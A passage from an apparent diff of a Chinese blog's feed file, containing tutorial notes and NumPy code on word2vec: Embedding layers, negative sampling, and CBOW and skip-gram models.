    array([[ 3,  4,  5],       [ 0,  1,  2],       [ 9, 10, 11],       [ 0,  1,  2]])

    实现 Embedding 层的 forward()backward()方法:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    class Embedding:
    def __init__(self, W):
    """
    使用 params 和 grads 作为成员变量
    """
    self.params = [W]
    self.grads = [np.zeros_like(W)]
    self.idx = None


    def forward(self, idx):
    """
    在成员变量 idx 中以数组的形式保存需要提取的行的索引(单词 ID)
    在反向传播时,从上一层(输出侧的层)传过来的梯度将原样传给下一层(输入侧的层)。
    不过,从上一层传来的梯度会被应用到权重梯度 dW 的特定行(idx)
    """
    W, = self.params
    self.idx = idx
    out = W[idx]
    return out


    def backward(self, dout):
    dW, = self.grads
    dW[...] = 0

    """
    dW[self.idx] = dout 是不太好的方式,存在一个问题,
    这一问题发生在 idx 的元素出现重复时,其中某个值就会被覆盖掉。
    """
    for i, word_id in enumerate(self.idx):
    dW[word_id] += dout[i]
    # 或者
    # np.add.at(dW, self.idx, dout)
    return None

    4.2 word2vec 的改进 2

    采用名为**负采样(negative sampling)**的方法作为解决方案。使用 Negative Sampling 替代 Softmax,无论词汇量有多大,都可以使计算量保持较低或恒定。

    4.2.1 中间层之后的计算问题

    png

    输入层和输出层有 100 万个神经元。在上一节中,通过引入 Embedding 层,节省了输入层中不必要的计算。剩下的问题就是中间层之后的处理。此时,在以下两个地方需要很多计算时间。

    • 中间层的神经元和权重矩阵($W_{out}$)的乘积

      • 问题在于巨大的矩阵乘积计算。在上面的例子中,中间层向量的大小是 100,权重矩阵的大小是 100 × 1 000 000 万,如此巨大的矩阵乘积计算需要大量时间(也需要大量内存)。此外,因为反向传播时也要进行同样的计算,所以很有必要将矩阵乘积计算“轻量化”。
    • Softmax 层的计算

      • 随着词汇量的增加,Softmax 的计算量也会增加,这个计算量与词汇量成正比。

    4.2.2 从多分类到二分类

    现在,我们来考虑如何将多分类问题转化为二分类问题。为此,我们先考察一个可以用“Yes/No”来回答的问题。比如,让神经网络来回答“当上下文是 you 和 goodbye 时,目标词是 say 吗?”这个问题,这时输出层只需要一个神经元即可。可以认为输出层的神经元输出的是 say 的得分。

    输出层的神经元仅有一个。因此,要计算中间层和输出侧的权重矩阵的乘积,只需要提取 say 对应的列(单词向量),并用它与中间层的神经元计算内积即可。

    4.2.3sigmoid 函数和交叉熵误差

    在多分类的情况下,输出层使用 Softmax 函数将得分转化为概率,损失函数使用交叉熵误差。在二分类的情况下,输出层使用 sigmoid 函数,损失函数也使用交叉熵误差。

    通过 sigmoid 函数得到概率 $y$ 后,可以由概率 $y$ 计算损失。与多分类一样,用于 sigmoid 函数的损失函数也是交叉熵误差,其数学式如下所示:

    $$L=-(t\log y+(1-t)\log(1-y))$$

    其中,$y$ 是 sigmoid 函数的输出,$t$ 是正确解标签,取值为 0 或 1;取值为 1 时表示正确解是“Yes”;取值为 0 时表示正确解是“No”。因此,当 $t$ 为 1 时,输出 $−\log y$;当 $t$ 为 0 时,输出 $−\log (1 − y)$。

    4.2.4 多分类到二分类的实现

    引入 Embedding Dot 层,该层将 Embedding 层和 dot 运算(内积)合并起来处理。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    class EmbeddingDot:
    def __init__(self, W):
    """
    params: 保存参数
    grads: 保存梯度
    embed: 保存 Embedding 层作为缓存
    cache: 保存正向传播时的计算结果
    """
    self.embed = Embedding(W)
    self.params = self.embed.params
    self.grads = self.embed.grads
    self.cache = None


    def forward(self, h, idx):
    target_W = self.embed.forward(idx)
    out = np.sum(target_W * h, axis=1)
    self.cache = (h, target_W)
    return out


    def backward(self, dout):
    h, target_W = self.cache
    dout = dout.reshape(dout.shape[0], 1)
    dtarget_W = dout * h
    self.embed.backward(dtarget_W)
    dh = dout * target_W
    return dh

    4.2.5 负采样

    png

    我们目前仅学习了正例(正确答案),还不确定负例(错误答案)会有怎样的结果。

    当前的神经网络只是学习了正例 say,但是对 say 之外的负例一无所知。

    而我们真正要做的事情是,对于正例(say),使 Sigmoid 层的输出接近 1;对于负例(say 以外的单词),使 Sigmoid 层的输出接近 0。

    那么,我们需要以所有的负例为对象进行学习吗?答案显然是“No”。如果以所有的负例为对象,词汇量将暴增至无法处理(更何况本章的目的本来就是解决词汇量增加的问题)。为此,作为一种近似方法,我们将选择若干个(5 个或者 10 个)负例(如何选择将在下文介绍)。也就是说,只使用少数负例。这就是负采样方法的含义。

    4.2.6 负采样的采样方法

    基于语料库中各个单词的出现次数求出概率分布后,只需根据这个概率分布进行采样就可以了。通过根据概率分布进行采样,语料库中经常出现的单词将容易被抽到,而“稀有单词”将难以被抽到。

    使用 Python 来说明基于概率分布的采样:

    1
    2
    # 从 0 到 9 的数字中随机选择一个数字
    np.random.choice(10)
    4
    1
    2
    3
    # 从 words 列表中随机选择一个元素
    words = ['you', 'say', 'goodbye', 'I', 'hello', '.']
    np.random.choice(words)
    'goodbye'
    1
    2
    # 有放回采样 5 次
    np.random.choice(words, size=5)
    array(['you', '.', 'say', 'hello', 'say'], dtype='<U7')
    1
    2
    # 无放回采样 5 次
    np.random.choice(words, size=5, replace=False)
    array(['goodbye', 'I', 'say', 'you', 'hello'], dtype='<U7')
    1
    2
    3
    # 基于概率分布进行采样
    p = [0.5, 0.1, 0.05, 0.2, 0.05, 0.1]
    np.random.choice(words, p=p)
    'I'

    word2vec 中提出的负采样对刚才的概率分布增加了一个步骤。如下式所示,对原来的概率分布取 0.75 次方。

    $$P’(w_i)=\frac{P(w_i){0.75}}{\sumn_jP(w_j)^{0.75}}$$

    为了防止低频单词被忽略。更准确地说,通过取 0.75 次方,低频单词的概率将稍微变高。

    1
    2
    3
    4
    p = [0.7, 0.29, 0.01]
    new_p = np.power(p, 0.75)
    new_p /= np.sum(new_p)
    print(new_p)
    [0.64196878 0.33150408 0.02652714]

    根据这个例子,变换前概率为 0.01(1%)的元素,变换后为 0.026…(2.6…%)。通过这种方式,取 0.75 次方作为一种补救措施,使得低频单词稍微更容易被抽到。

    此外,0.75 这个值并没有什么理论依据,也可以设置成 0.75 以外的值。

    1
    2
    3
    4
    5
    6
    7
    8
    corpus = np.array([0, 1, 2, 3, 4, 1, 2, 3])
    power = 0.75
    sample_size = 2
    # 该方法以参数 target 指定的单词 ID 为正例,对其他的单词 ID 进行采样。
    sampler = UnigramSampler(corpus, power, sample_size)
    target = np.array([1, 3, 0])
    negative_sample = sampler.get_negative_sample(target)
    print(negative_sample)

    4.2.7 负采样的实现

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    class NegativeSamplingLoss:
    def __init__(self, W, corpus, power=0.75, sample_size=5):
    self.sample_size = sample_size
    self.sampler = UnigramSampler(corpus, power, sample_size)
    self.loss_layers = [SigmoidWithLoss() for _ in range(sample_size + 1)]
    self.embed_dot_layers = [EmbeddingDot(W) for _ in range(sample_size + 1)]
    self.params, self.grads = [], []
    for layer in self.embed_dot_layers:
    self.params += layer.params
    self.grads += layer.grads


    def forward(self, h, target):
    """
    h: 中间层的神经元
    target: 正例目标
    """
    batch_size = target.shape[0]
    # 使用 self.sampler 采样负例,并设为 negative_sample
    negative_sample = self.sampler.get_negative_sample(target)

    # 正例的正向传播
    score = self.embed_dot_layers[0].forward(h, target)
    correct_label = np.ones(batch_size, dtype=np.int32) # 正例的正确解标签为 1
    loss = self.loss_layers[0].forward(score, correct_label)

    # 负例的正向传播
    negative_label = np.zeros(batch_size, dtype=np.int32) # 负例的正确解标签为 0
    for i in range(self.sample_size):
    negative_target = negative_sample[:, i]
    score = self.embed_dot_layers[1 + i].forward(h, negative_target)
    loss += self.loss_layers[1 + i].forward(score, negative_label)

    return loss


    def backward(self, dout=1):
    dh = 0
    for l0, l1 in zip(self.loss_layers, self.embed_dot_layers):
    """
    与正向传播相反的顺序调用各层的 backward() 函数即可
    """
    dscore = l0.backward(dout)
    dh += l1.backward(dscore)
    return dh

    4.3 改进版 word2vec 的学习

    4.3.1 CBOW 模型的实现

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    import sys
    sys.path.append('..')
    from common.np import * # import numpy as np
    from common.layers import Embedding
    from ch04.negative_sampling_layer import NegativeSamplingLoss


    class CBOW:
    def __init__(self, vocab_size, hidden_size, window_size, corpus):
    V, H = vocab_size, hidden_size

    # 初始化权重
    W_in = 0.01 * np.random.randn(V, H).astype('f')
    W_out = 0.01 * np.random.randn(V, H).astype('f')

    # 生成层
    self.in_layers = []
    for i in range(2 * window_size):
    layer = Embedding(W_in) # 使用 Embedding 层
    self.in_layers.append(layer)
    self.ns_loss = NegativeSamplingLoss(W_out, corpus, power=0.75, sample_size=5)

    # 将所有的权重和梯度整理到列表中
    layers = self.in_layers + [self.ns_loss]
    self.params, self.grads = [], []
    for layer in layers:
    self.params += layer.params
    self.grads += layer.grads

    # 将单词的分布式表示设置为成员变量
    self.word_vecs = W_in


    def forward(self, contexts, target):
    h = 0
    for i, layer in enumerate(self.in_layers):
    h += layer.forward(contexts[:, i])
    h *= 1 / len(self.in_layers)
    loss = self.ns_loss.forward(h, target)
    return loss


    def backward(self, dout=1):
    dout = self.ns_loss.backward(dout)
    dout *= 1 / len(self.in_layers)
    for layer in self.in_layers:
    layer.backward(dout)
    return None

    4.3.2 CBOW 模型的学习代码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    import sys
    sys.path.append('..')
    import numpy as np
    from common import config
    # 在用 GPU 运行时,请打开下面的注释(需要 cupy)
    # ===============================================
    config.GPU = True
    # ===============================================
    import pickle
    from common.trainer import Trainer
    from common.optimizer import Adam
    from common.util import create_contexts_target, to_cpu, to_gpu
    from dataset import ptb

    # 设定超参数
    window_size = 5
    hidden_size = 100
    batch_size = 100
    max_epoch = 10

    # 读入数据
    corpus, word_to_id, id_to_word = ptb.load_data('train')
    vocab_size = len(word_to_id)

    contexts, target = create_contexts_target(corpus, window_size)
    if config.GPU:
    contexts, target = to_gpu(contexts), to_gpu(target)

    # 生成模型等
    model = CBOW(vocab_size, hidden_size, window_size, corpus)
    optimizer = Adam()
    trainer = Trainer(model, optimizer)

    # 开始学习
    trainer.fit(contexts, target, max_epoch, batch_size)
    trainer.plot()

    # 保存必要数据,以便后续使用
    word_vecs = model.word_vecs
    if config.GPU:
    word_vecs = to_cpu(word_vecs)
    params = {}
    params['word_vecs'] = word_vecs.astype(np.float16)
    params['word_to_id'] = word_to_id
    params['id_to_word'] = id_to_word
    pkl_file = 'cbow_params.pkl'
    with open(pkl_file, 'wb') as f:
    pickle.dump(params, f, -1)

    4.3.3 CBOW 模型的评价

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import sys
    sys.path.append('..')
    from common.util import most_similar
    import pickle

    pkl_file = 'cbow_params.pkl'
    with open(pkl_file, 'rb') as f:
    params = pickle.load(f)
    word_vecs = params['word_vecs']
    word_to_id = params['word_to_id']
    id_to_word = params['id_to_word']

    querys = ['you', 'year', 'car', 'toyota']
    for query in querys:
    most_similar(query, word_to_id, id_to_word, word_vecs, top=5)

    4.4 word2vec 相关的其他话题

    4.4.1 word2vec 的应用例

    在自然语言处理领域,单词的分布式表示之所以重要,原因就在于迁移学习(transfer learning)。迁移学习是指在某个领域学到的知识可以被应用于其他领域。

    将单词和文档转化为固定长度的向量是非常重要的。因为如果可以将自然语言转化为向量,就可以使用常规的机器学习方法(神经网络、SVM 等)

    png

    4.4.2 单词向量的评价方法

    单词相似度的评价通常使用人工创建的单词相似度评价集来评估。比如,cat 和 animal 的相似度是 8,cat 和 car 的相似度是 2……类似这样,用 0~10 的分数人工地对单词之间的相似度打分。然后,比较人给出的分数和 word2vec 给出的余弦相似度,考察它们之间的相关性。

    4.5 小结

    • Embedding 层保存单词的分布式表示,在正向传播时,提取单词 ID 对应的向量

    • 因为 word2vec 的计算量会随着词汇量的增加而成比例地增加,所以最好使用近似计算来加速

    • 负采样技术采样若干负例,使用这一方法可以将多分类问题转化为二分类问题进行处理

    • 基于 word2vec 获得的单词的分布式表示内嵌了单词含义,在相似的上下文中使用的单词在单词向量空间上处于相近的位置

    • word2vec 的单词的分布式表示的一个特性是可以基于向量的加减法运算来求解类推问题

    • word2vec 的迁移学习能力非常重要,它的单词的分布式表示可以应用于各种各样的自然语言处理任务

    ]]>
    @@ -7982,7 +7982,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E8%BF%9B%E9%98%B6-%E8%87%AA%E7%84%B6%E8%AF%AD%E8%A8%80%E5%A4%84%E7%90%86-3-word2vec/ - 正文

    3.1 基于推理的方法和神经网络

    向量表示单词的研究:

    • 基于计数的方法

    • 基于推理的方法

    两者在获得单词含义的方法上差别很大,但两者的背景都是分布式假设。

    3.1.1 基于计数的方法的问题

    对于一个 $n\times n$ 的矩阵,SVD 的复杂度是 $O(n^3)$,这表示计算量与 $n$ 的立方成比例增长。如此大的计算成本,即便是超级计算机也无法胜任。实际上,利用近似方法和稀疏矩阵的性质,可以在一定程度上提高处理速度,但还是需要大量的计算资源和时间。

    png

    3.1.2 基于推理的方法的概要

    基于推理的方法的主要操作是“推理”。当给出周围的单词(上下文)时,预测“?”处会出现什么单词,这就是推理。

    png

    3.1.3 神经网络中的单词的处理方法

    我们将使用神经网络来处理单词。但是,神经网络无法直接处理 you 或 say 这样的单词,要用神经网络处理单词,需要先将单词转化为固定长度的向量。对此,一种方式是将单词转换为 one-hot 表示(one-hot 向量)。在 one-hot 表示中,只有一个元素是 1,其他元素都是 0。

    import numpy as np

    c = np.array([[1, 0, 0, 0, 0, 0, 0]]) # 输入
    W = np.random.randn(7, 3) # 权重
    h = np.dot(c, W) # 中间节点
    print(h)
    [[-0.7200455  -0.12248471 -0.19002763]]

    png

    3.2 简单的 word2vec

    使用由原版 word2vec 提出的名为 **continuous bag-of-words(CBOW)**的模型作为神经网络。

    3.2.1 CBOW 模型的推理

    png

    中间层的神经元是各个输入层经全连接层变换后得到的值的“平均”。

    经全连接层变换后,第 1 个输入层转化为 $h_1$,第 2 个输入层转化为 $h_2$,那么中间层的神经元是 $\frac{1}{2}(h_1+h_2)$。

    从输入层到中间层的变换由全连接层(权重是 $W_{in}$)完成。此时,全连接层的权重 $W_{in}$ 是一个 $7\times 3$ 的矩阵。提前剧透一下,这个权重就是我们要的单词的分布式表示。如此获得的向量很好地对单词含义进行了编码。这就是 word2vec 的全貌。

    import sys
    sys.path.append('..')
    import numpy as np
    from common.layers import MatMul

    # 样本的上下文数据
    c0 = np.array([[1, 0, 0, 0, 0, 0, 0]])
    c1 = np.array([[0, 0, 1, 0, 0, 0, 0]])

    # 权重的初始值
    W_in = np.random.randn(7, 3)
    W_out = np.random.randn(3, 7)

    # 生成层
    in_layer0 = MatMul(W_in)
    in_layer1 = MatMul(W_in)
    out_layer = MatMul(W_out)

    # 正向传播
    h0 = in_layer0.forward(c0)
    h1 = in_layer1.forward(c1)
    h = 0.5 * (h0 + h1)
    s = out_layer.forward(h)

    print(s)
    [[-1.6202109   0.75824908 -0.05364709 -0.39814822 -0.37373042  0.51207421   0.8510953 ]]

    CBOW 模型是没有使用激活函数的简单的网络结构。

    3.2.2 CBOW 模型的学习

    png

    上下文是 you 和 goodbye,正确解标签(神经网络应该预测出的单词)是 say。这时,如果网络具有“良好的权重”,那么在表示概率的神经元中,对应正确解的神经元的得分应该更高。

    CBOW 模型的学习就是调整权重,以使预测准确。其结果是,权重 $W_{in}$(确切地说是 $W_{in}$ 和 $W_{out}$ 两者)学习到蕴含单词出现模式的向量。

    对其进行学习只是使用一下 Softmax 函数和交叉熵误差。首先,使用 Softmax 函数将得分转化为概率,再求这些概率和监督标签之间的交叉熵误差,并将其作为损失进行学习。

    3.2.3 word2vec 的权重和分布式表示

    word2vec 中使用的网络有两个权重,分别是输入侧的全连接层的权重($W_{in}$)和输出侧的全连接层的权重($W_{out}$)。

    一般而言,输入侧的权重 $W_{in}$ 的每一行对应于各个单词的分布式表示。另外,输出侧的权重 $W_{out}$ 也同样保存了对单词含义进行了编码的向量。

    3.3 学习数据的准备

    3.3.1 上下文和目标词

    png

    word2vec 中使用的神经网络的输入是上下文,它的正确解标签是被这些上下文包围在中间的单词,即目标词。

    将语料库中的目标单词作为目标词,将其周围的单词作为上下文提取出来。我们对语料库中的所有单词都执行该操作(两端的单词除外),可以得到 contexts(上下文)和 target(目标词)。

    将语料库的文本转换成单词 ID

    import sys
    sys.path.append('..')
    from common.util import preprocess

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    print(corpus)
    print(id_to_word)
    [0 1 2 3 4 1 5 6]{0: 'you', 1: 'say', 2: 'goodbye', 3: 'and', 4: 'i', 5: 'hello', 6: '.'}

    实现生成上下文和目标词的函数

    def create_contexts_target(corpus, window_size=1):
    """
    corpus: 单词 ID 列表
    window_size: 上下文的窗口大小
    return: NumPy 多维数组格式的上下文和目标词
    """
    # 就目标词而言,target[0] 保存的是第 0 个目标词,target[1] 保存的是第 1 个目标词。
    target = corpus[window_size:-window_size]
    """
    contexts 是二维数组。此时,contexts 的第 0 维保存的是各个上下文数据。
    具体来说,contexts[0] 保存的是第 0 个上下文,context[1] 保存的是第 1 个上下文。
    """
    contexts = []

    for idx in range(window_size, len(corpus)-window_size):
    cs = []
    for t in range(-window_size, window_size + 1):
    if t == 0:
    continue
    cs.append(corpus[idx + t])
    contexts.append(cs)
    return np.array(contexts), np.array(target)
    contexts, target = create_contexts_target(corpus, window_size=1)

    print(contexts)
    [[0 2] [1 3] [2 4] [3 1] [4 5] [1 6]]

    这样就从语料库生成了上下文和目标词,后面只需将它们赋给 CBOW 模型即可。不过,因为这些上下文和目标词的元素还是单词 ID,所以还需
    要将它们转化为 one-hot 表示。

    3.3.2 转换为 one-hot 表示

    png

    import sys
    sys.path.append('..')
    from common.util import preprocess, create_contexts_target, convert_one_hot

    text = 'You say goodbye and I say hello.'

    corpus, word_to_id, id_to_word = preprocess(text)

    contexts, target = create_contexts_target(corpus, window_size=1)

    vocab_size = len(word_to_id)
    target = convert_one_hot(target, vocab_size)
    contexts = convert_one_hot(contexts, vocab_size)

    3.4 CBOW 模型的实现

    png

    import sys
    sys.path.append('..')
    import numpy as np
    from common.layers import MatMul, SoftmaxWithLoss

    class SimpleCBOW:
    def __init__(self, vocab_size, hidden_size):
    """
    vocab_size: 词汇个数
    hidden_size: 中间层的神经元个数
    """
    V, H = vocab_size, hidden_size

    # 初始化权重
    W_in = 0.01 * np.random.randn(V, H).astype('f') # 初始化将使用 32 位的浮点数
    W_out = 0.01 * np.random.randn(H, V).astype('f')

    # 生成层
    self.in_layer0 = MatMul(W_in)
    self.in_layer1 = MatMul(W_in)
    self.out_layer = MatMul(W_out)
    self.loss_layer = SoftmaxWithLoss()

    # 将所有的权重和梯度整理到列表中
    layers = [self.in_layer0, self.in_layer1, self.out_layer]
    self.params, self.grads = [], []
    for layer in layers:
    self.params += layer.params
    self.grads += layer.grads

    # 将单词的分布式表示设置为成员变量
    self.word_vecs = W_in


    def forward(self, contexts, target):
    """
    神经网络的正向传播 forward() 函数。
    这个函数接收参数 contexts 和 target,并返回损失(loss)。
    """
    h0 = self.in_layer0.forward(contexts[:, 0])
    h1 = self.in_layer1.forward(contexts[:, 1])
    h = (h0 + h1) * 0.5
    score = self.out_layer.forward(h)
    loss = self.loss_layer.forward(score, target)
    return loss


    def backward(self, dout=1):
    """
    反向传播
    """
    ds = self.loss_layer.backward(dout)
    da = self.out_layer.backward(ds)
    da *= 0.5
    self.in_layer1.backward(da)
    self.in_layer0.backward(da)
    return None

    学习的实现

    CBOW 模型的学习和一般的神经网络的学习完全相同。首先,给神经网络准备好学习数据。然后,求梯度,并逐步更新权重参数。

    import sys
    sys.path.append('..')
    from common.trainer import Trainer
    from common.optimizer import Adam
    from common.util import preprocess, create_contexts_target, convert_one_hot

    window_size = 1
    hidden_size = 5
    batch_size = 3
    max_epoch = 1000

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)

    vocab_size = len(word_to_id)
    contexts, target = create_contexts_target(corpus, window_size)
    target = convert_one_hot(target, vocab_size)
    contexts = convert_one_hot(contexts, vocab_size)

    model = SimpleCBOW(vocab_size, hidden_size)
    optimizer = Adam()
    trainer = Trainer(model, optimizer)
    trainer.fit(contexts, target, max_epoch, batch_size)
    trainer.plot()

    png

    查看学习后的权重参数

    word_vecs = model.word_vecs
    for word_id, word in id_to_word.items():
    print(word, word_vecs[word_id])
    you [-0.9274265  -0.91214865 -0.9109259   0.8992449  -1.6783223 ]say [ 1.1131934  1.0601219  1.1271317 -1.1453978 -1.2170266]goodbye [-0.9434733  -0.9451493  -1.0034578   1.0183493   0.01961206]and [ 0.68801135  1.3125733   0.7976222  -0.66661966 -1.7473713 ]i [-0.9705925  -0.96961325 -1.0059276   1.0296363   0.02202316]hello [-0.9177436  -0.9189522  -0.90853983  0.89148486 -1.6829524 ]. [ 1.2674404   0.2086714   1.1918164  -1.3567644   0.25613624]

    这里使用的小型语料库并没有给出很好的结果。当然,主要原因是语料库太小了。如果换成更大、更实用的语料库,相信会获得更好的结果。但是,这样在处理速度方面又会出现新的问题,这是因为当前这个 CBOW 模型的实现在处理效率方面存在几个问题。

    3.5 word2vec 的补充说明

    3.5.1 CBOW 模型和概率

    给定上下文 $w_{t−1}$ 和 $w_{t+1}$ 时目标词为 $w_t$ 的概率。使用后验概率:

    $$P(w_t|w_{t-1},w_{t+1})$$

    CBOW 模型的损失函数只是对上式的概率取 $\log$,并加上负号。顺便提一下,这也称为负对数似然(negative log likelihood)

    $$L=-\log P(w_t|w_{t-1}, w_{t+1})$$

    上式是一笔样本数据的损失函数。如果将其扩展到整个语料库:

    $$L=-\frac{1}{T}\sum^T_{t=1}\log P(w_t|w_{t-1}, w_{t+1})$$

    3.5.2skip-gram 模型

    png

    skip-gram 是反转了 CBOW 模型处理的上下文和目标词的模型。

    • CBOW 模型从上下文的多个单词预测中间的单词(目标词)

    • skip-gram 模型则从中间的单词(目标词)预测周围的多个单词(上下文)

    skip-gram 可以建模为:

    $$P(w_{t-1}, w_{t+1}|w_t)$$

    “当给定 $w_t$ 时,$w_{t−1}$ 和 $w_{t+1}$ 同时发生的概率”。

    $$P(w_{t-1},w_{t+1}|w_t)=P(w_{t-1}|w_t)P(w_{t+1}|w_t)$$

    带入交叉熵损失函数,推导出 skip-gram 模型的损失函数:

    $$L=-\frac{1}{T}\sum^T_{t=1}(\log P(w_{t-1}|w_t) + \log P(w_{t+1}|w_t))$$

    3.5.3 基于计数于基于推理

    • 基于计数的方法通过对整个语料库的统计数据进行一次学习来获得单词的分布式表示

    • 基于推理的方法则反复观察语料库的一部分数据进行学习(mini-batch 学习)

    在 word2vec 之后,有研究人员提出了 GloVe 方法。GloVe 方法融合了基于推理的方法和基于计数的方法。该方法的思想是,将整个语料库的统计数据的信息纳入损失函数,进行 mini-batch 学习(具体请参考论文)。据此,这两个方法论成功地被融合在了一起。

    3.6 小结

    • 基于推理的方法以预测为目标,同时获得了作为副产物的单词的分布式表示

    • word2vec 是基于推理的方法,由简单的 2 层神经网络构成

    • word2vec 有 skip-gram 模型和 CBOW 模型

    • CBOW 模型从多个单词(上下文)预测 1 个单词(目标词)

    • skip-gram 模型反过来从 1 个单词(目标词)预测多个单词(上下文)

    • 由于 word2vec 可以进行权重的增量学习,所以能够高效地更新或添加单词的分布式表示

    ]]>
    + 正文

    3.1 基于推理的方法和神经网络

    向量表示单词的研究:

    • 基于计数的方法

    • 基于推理的方法

    两者在获得单词含义的方法上差别很大,但两者的背景都是分布式假设。

    3.1.1 基于计数的方法的问题

    对于一个 $n\times n$ 的矩阵,SVD 的复杂度是 $O(n^3)$,这表示计算量与 $n$ 的立方成比例增长。如此大的计算成本,即便是超级计算机也无法胜任。实际上,利用近似方法和稀疏矩阵的性质,可以在一定程度上提高处理速度,但还是需要大量的计算资源和时间。

    png

    3.1.2 基于推理的方法的概要

    基于推理的方法的主要操作是“推理”。当给出周围的单词(上下文)时,预测“?”处会出现什么单词,这就是推理。

    png

    3.1.3 神经网络中的单词的处理方法

    我们将使用神经网络来处理单词。但是,神经网络无法直接处理 you 或 say 这样的单词,要用神经网络处理单词,需要先将单词转化为固定长度的向量。对此,一种方式是将单词转换为 one-hot 表示(one-hot 向量)。在 one-hot 表示中,只有一个元素是 1,其他元素都是 0。

    1
    2
    3
    4
    5
    6
    import numpy as np

    c = np.array([[1, 0, 0, 0, 0, 0, 0]]) # 输入
    W = np.random.randn(7, 3) # 权重
    h = np.dot(c, W) # 中间节点
    print(h)
    [[-0.7200455  -0.12248471 -0.19002763]]

    png

    3.2 简单的 word2vec

    使用由原版 word2vec 提出的名为 **continuous bag-of-words(CBOW)**的模型作为神经网络。

    3.2.1 CBOW 模型的推理

    png

    中间层的神经元是各个输入层经全连接层变换后得到的值的“平均”。

    经全连接层变换后,第 1 个输入层转化为 $h_1$,第 2 个输入层转化为 $h_2$,那么中间层的神经元是 $\frac{1}{2}(h_1+h_2)$。

    从输入层到中间层的变换由全连接层(权重是 $W_{in}$)完成。此时,全连接层的权重 $W_{in}$ 是一个 $7\times 3$ 的矩阵。提前剧透一下,这个权重就是我们要的单词的分布式表示。如此获得的向量很好地对单词含义进行了编码。这就是 word2vec 的全貌。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    import sys
    sys.path.append('..')
    import numpy as np
    from common.layers import MatMul

    # 样本的上下文数据
    c0 = np.array([[1, 0, 0, 0, 0, 0, 0]])
    c1 = np.array([[0, 0, 1, 0, 0, 0, 0]])

    # 权重的初始值
    W_in = np.random.randn(7, 3)
    W_out = np.random.randn(3, 7)

    # 生成层
    in_layer0 = MatMul(W_in)
    in_layer1 = MatMul(W_in)
    out_layer = MatMul(W_out)

    # 正向传播
    h0 = in_layer0.forward(c0)
    h1 = in_layer1.forward(c1)
    h = 0.5 * (h0 + h1)
    s = out_layer.forward(h)

    print(s)
    [[-1.6202109   0.75824908 -0.05364709 -0.39814822 -0.37373042  0.51207421   0.8510953 ]]

    CBOW 模型是没有使用激活函数的简单的网络结构。

    3.2.2 CBOW 模型的学习

    png

    上下文是 you 和 goodbye,正确解标签(神经网络应该预测出的单词)是 say。这时,如果网络具有“良好的权重”,那么在表示概率的神经元中,对应正确解的神经元的得分应该更高。

    CBOW 模型的学习就是调整权重,以使预测准确。其结果是,权重 $W_{in}$(确切地说是 $W_{in}$ 和 $W_{out}$ 两者)学习到蕴含单词出现模式的向量。

    对其进行学习只是使用一下 Softmax 函数和交叉熵误差。首先,使用 Softmax 函数将得分转化为概率,再求这些概率和监督标签之间的交叉熵误差,并将其作为损失进行学习。

    3.2.3 word2vec 的权重和分布式表示

    word2vec 中使用的网络有两个权重,分别是输入侧的全连接层的权重($W_{in}$)和输出侧的全连接层的权重($W_{out}$)。

    一般而言,输入侧的权重 $W_{in}$ 的每一行对应于各个单词的分布式表示。另外,输出侧的权重 $W_{out}$ 也同样保存了对单词含义进行了编码的向量。

    3.3 学习数据的准备

    3.3.1 上下文和目标词

    png

    word2vec 中使用的神经网络的输入是上下文,它的正确解标签是被这些上下文包围在中间的单词,即目标词。

    将语料库中的目标单词作为目标词,将其周围的单词作为上下文提取出来。我们对语料库中的所有单词都执行该操作(两端的单词除外),可以得到 contexts(上下文)和 target(目标词)。

    将语料库的文本转换成单词 ID

    1
    2
    3
    4
    5
    6
    7
    8
    import sys
    sys.path.append('..')
    from common.util import preprocess

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    print(corpus)
    print(id_to_word)
    [0 1 2 3 4 1 5 6]{0: 'you', 1: 'say', 2: 'goodbye', 3: 'and', 4: 'i', 5: 'hello', 6: '.'}

    实现生成上下文和目标词的函数

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    def create_contexts_target(corpus, window_size=1):
    """
    corpus: 单词 ID 列表
    window_size: 上下文的窗口大小
    return: NumPy 多维数组格式的上下文和目标词
    """
    # 就目标词而言,target[0] 保存的是第 0 个目标词,target[1] 保存的是第 1 个目标词。
    target = corpus[window_size:-window_size]
    """
    contexts 是二维数组。此时,contexts 的第 0 维保存的是各个上下文数据。
    具体来说,contexts[0] 保存的是第 0 个上下文,context[1] 保存的是第 1 个上下文。
    """
    contexts = []

    for idx in range(window_size, len(corpus)-window_size):
    cs = []
    for t in range(-window_size, window_size + 1):
    if t == 0:
    continue
    cs.append(corpus[idx + t])
    contexts.append(cs)
    return np.array(contexts), np.array(target)
    1
    2
    3
    contexts, target = create_contexts_target(corpus, window_size=1)

    print(contexts)
    [[0 2] [1 3] [2 4] [3 1] [4 5] [1 6]]

